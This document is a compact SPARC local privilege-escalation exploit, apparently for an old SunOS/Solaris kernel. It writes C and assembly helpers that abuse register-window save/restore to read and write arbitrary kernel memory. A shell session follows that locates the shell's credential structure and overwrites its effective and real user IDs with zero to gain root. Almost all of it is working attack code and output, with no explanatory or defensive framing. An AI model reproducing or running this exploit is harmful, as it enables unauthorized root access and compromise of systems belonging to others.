cat > readc.c << _EOF_ main(argc, argv) char *argv[]; { printf("0x%x\n", rdmem(strtoul(argv[1], 0, 0))); } _EOF_ cat > reads.s << _EOF_ .globl rdmem rdmem: save %sp, 64, %sp save %sp, 64, %sp save %sp, 64, %sp save %sp, 64, %sp save %sp, 64, %sp save %sp, 64, %sp save %sp, 64, %sp restore restore restore restore restore restore restore mov %sp, %i4 mov %o7, %i7 btst 4, %o0 andn %o0, 7, %fp restore bz,a .+12 mov %l0, %i0 mov %l1, %i0 mov %o4, %fp retl restore _EOF_ cat > writec.c << _EOF_ main(argc, argv) char *argv[]; { wrmem(strtoul(argv[1], 0, 0), strtoul(argv[2], 0, 0)); } _EOF_ cat > writes.s << _EOF_ .globl wrmem wrmem: save %sp, 64, %sp save %sp, 64, %sp save %sp, 64, %sp save %sp, 64, %sp save %sp, 64, %sp save %sp, 64, %sp save %sp, 64, %sp restore restore restore restore restore restore restore mov %o1, %i1 mov %sp, %i4 mov %o7, %i7 btst 4, %o0 andn %o0, 7, %fp restore bz,a .+12 mov %o1, %l0 mov %o1, %l1 save %o4, 64, %sp save %sp, 64, %sp save %sp, 64, %sp save %sp, 64, %sp save %sp, 64, %sp save %sp, 64, %sp save %sp, 64, %sp restore restore restore restore restore restore restore mov %o4, %fp retl restore _EOF_ cc -o read readc.c reads.s cc -o write writec.c writes.s otsuka% ps -lp $$ F S UID PID PPID C PRI NI ADDR SZ WCHAN TTY TIME COMD 8 S 23384 641 1145 1 20 fcfd6800 374 fcfd69c8 console 0:01 csh # Offset 0x28 is the pointer to the shell's ucred struct. otsuka% ./read 0xfcfd6828 0xfcfbc380 # Offsets 0x4 and 0xc in the ucred contain the effective and real uid. otsuka% ./write 0xfcfbc384 0 otsuka% ./write 0xfcfbc38c 0 whoami